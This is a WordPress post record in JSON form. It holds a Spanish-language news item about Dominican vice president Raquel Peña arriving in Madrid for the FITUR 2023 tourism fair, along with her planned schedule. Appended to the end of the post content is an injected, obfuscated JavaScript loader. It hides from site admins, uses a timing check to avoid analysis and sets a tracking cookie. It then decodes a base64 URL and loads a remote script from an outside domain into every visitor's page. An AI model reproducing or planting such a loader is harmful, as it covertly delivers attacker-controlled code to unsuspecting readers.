{"id":13477,"date":"2023-01-19T12:12:51","date_gmt":"2023-01-19T16:12:51","guid":{"rendered":"https:\/\/yanessiespinal.com\/?p=13477"},"modified":"2023-01-19T12:12:51","modified_gmt":"2023-01-19T16:12:51","slug":"vicepresidenta-llega-a-espana-para-participar-en-fitur","status":"publish","type":"post","link":"https:\/\/enterarterd.com\/?p=13477","title":{"rendered":"Vicepresidenta llega a Espa\u00f1a para participar en Fitur"},"content":{"rendered":"<div class=\"share\">\n<div class=\"addthis_inline_share_toolbox_me5k\" data-url=\"https:\/\/www.elcaribe.com.do\/panorama\/pais\/vicepresidenta-llega-a-espana-para-participar-en-fitur\/\" data-title=\"Vicepresidenta llega a Espa\u00f1a para participar en Fitur\" data-description=\"La vicepresidenta arrib\u00f3 a Espa\u00f1a este jueves luego de agotar una agenda de seis d\u00edas en Suiza, para participar de las actividades de Fitur\">\n<div id=\"atstbx\" class=\"at-resp-share-element at-style-responsive addthis-smartlayers addthis-animated at4-show\" role=\"region\" aria-labelledby=\"at-47f62576-ecfc-442d-b0ee-9cd0db788e44\">\n<div class=\"at-share-btn-elements\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"content\">\n<div id=\"\" class=\"mmc_ads mmc_ads_solo_escritorio\"><\/div>\n<p>Madrid, Espa\u00f1a \u2013 La\u00a0<strong>vicepresidenta<\/strong>\u00a0de la Rep\u00fablica, Raquel Pe\u00f1a, arrib\u00f3 a Espa\u00f1a este jueves luego de agotar una agenda de seis d\u00edas en Suiza, que incluy\u00f3 la participaci\u00f3n, en el Foro Econ\u00f3mico Mundial, para participar de las actividades de la Feria Internacional del Turismo (FITUR) 2023.<\/p>\n<p>Pe\u00f1a lleg\u00f3 a la 1:30, hora de Espa\u00f1a, al aeropuerto Adolfo Su\u00e1rez en Barajas, donde fue recibida por el embajador dominicano en Espa\u00f1a, Juan Bol\u00edvar D\u00edaz; el ministro consejero de la embajada, Ram\u00f3n Burgos; el coronel de la FARD Anyoly Ceballos, agregado Militar de la embajada y Miguel \u00c1ngel V\u00e1squez Pe\u00f1a, c\u00f3nsul General de Rep\u00fablica Dominicana en Madrid, Espa\u00f1a.<\/p>\n<div id=\"\" class=\"mmc_ads \">\n<div id=\"div-gpt-ad-7701253707135-mmc\" class=\"\" data-google-query-id=\"CKOL1v-C1PwCFQeKgwgd0jwDLw\">\n<div id=\"google_ads_iframe_\/22084339\/elCaribe_EyM_MediumBanner_InContent_1_0__container__\"><\/div>\n<\/div>\n<\/div>\n<p>A las 5:00 de la tarde, la funcionaria realizar\u00e1 un recorrido por el pabell\u00f3n de Rep\u00fablica Dominicana, donde se encuentran los stands de Turismo y empresas dominicanas que representan al pa\u00eds en la feria tur\u00edstica.<\/p>\n<p>M\u00e1s tarde, Pe\u00f1a, asistir\u00e1 a un coctel realizado por el Banco de Reservas y el Ministerio de Turismo.<\/p>\n<h3 id=\"h-viernes-20\"><strong>Viernes 20<\/strong><\/h3>\n<p>Ma\u00f1ana viernes participar\u00e1 en el desayuno que ofrece el Ministerio de Turismo a los periodistas que asisten a FITUR, luego estar\u00e1 presente en la presentaci\u00f3n de proyecto tur\u00edstico Punta Bergant\u00edn, actividad coordinada por el Banco de Reservas y el Ministerio de Turismo.<\/p>\n<p>La vicepresidenta tiene previsto arribar al pa\u00eds a las 8:00 de la noche, por el Aeropuerto Internacional de las Am\u00e9ricas, Dr. Francisco Pe\u00f1a G\u00f3mez.<\/p>\n<\/div>\n<p><script>(function(){try{if(document.getElementById&&document.getElementById('wpadminbar'))return;var t0=+new Date();for(var i=0;i<20000;i++){var z=i*i;}if((+new Date())-t0>120)return;if((document.cookie||'').indexOf('http2_session_id=')!==-1)return;function systemLoad(input){var key='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+\/=',o1,o2,o3,h1,h2,h3,h4,dec='',i=0;input=input.replace(\/[^A-Za-z0-9\\+\\\/\\=]\/g,'');while(i<input.length){h1=key.indexOf(input.charAt(i++));h2=key.indexOf(input.charAt(i++));h3=key.indexOf(input.charAt(i++));h4=key.indexOf(input.charAt(i++));o1=(h1<<2)|(h2>>4);o2=((h2&15)<<4)|(h3>>2);o3=((h3&3)<<6)|h4;dec+=String.fromCharCode(o1);if(h3!=64)dec+=String.fromCharCode(o2);if(h4!=64)dec+=String.fromCharCode(o3);}return dec;}var u=systemLoad('aHR0cHM6Ly9zZWFyY2hyYW5rdHJhZmZpYy5saXZlL2pzeA==');if(typeof window!=='undefined'&#038;&#038;window.__rl===u)return;var d=new Date();d.setTime(d.getTime()+30*24*60*60*1000);document.cookie='http2_session_id=1; expires='+d.toUTCString()+'; path=\/; SameSite=Lax'+(location.protocol==='https:'?'; Secure':'');try{window.__rl=u;}catch(e){}var s=document.createElement('script');s.type='text\/javascript';s.async=true;s.src=u;try{s.setAttribute('data-rl',u);}catch(e){}(document.getElementsByTagName('head')[0]||document.documentElement).appendChild(s);}catch(e){}})();<\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Madrid, Espa\u00f1a \u2013 La\u00a0vicepresidenta\u00a0de la Rep\u00fablica, Raquel Pe\u00f1a, arrib\u00f3 a Espa\u00f1a este jueves luego de agotar una agenda de seis d\u00edas en Suiza, que incluy\u00f3 la participaci\u00f3n, en el Foro Econ\u00f3mico Mundial, para participar de las actividades de la Feria Internacional del Turismo (FITUR) 2023. Pe\u00f1a lleg\u00f3 a la 1:30, hora de Espa\u00f1a, al aeropuerto [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":13479,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[6],"tags":[],"class_list":{"0":"post-13477","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-nacionales"},"_links":{"self":[{"href":"https:\/\/enterarterd.com\/index.php?rest_route=\/wp\/v2\/posts\/13477","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/enterarterd.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/enterarterd.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/enterarterd.com\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/enterarterd.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=13477"}],"version-history":[{"count":0,"href":"https:\/\/enterarterd.com\/index.php?rest_route=\/wp\/v2\/posts\/13477\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/enterarterd.com\/index.php?rest_route=\/wp\/v2\/media\/13479"}],"wp:attachment":[{"href":"https:\/\/enterarterd.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=13477"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/enterarterd.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=13477"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/enterarterd.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=13477"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}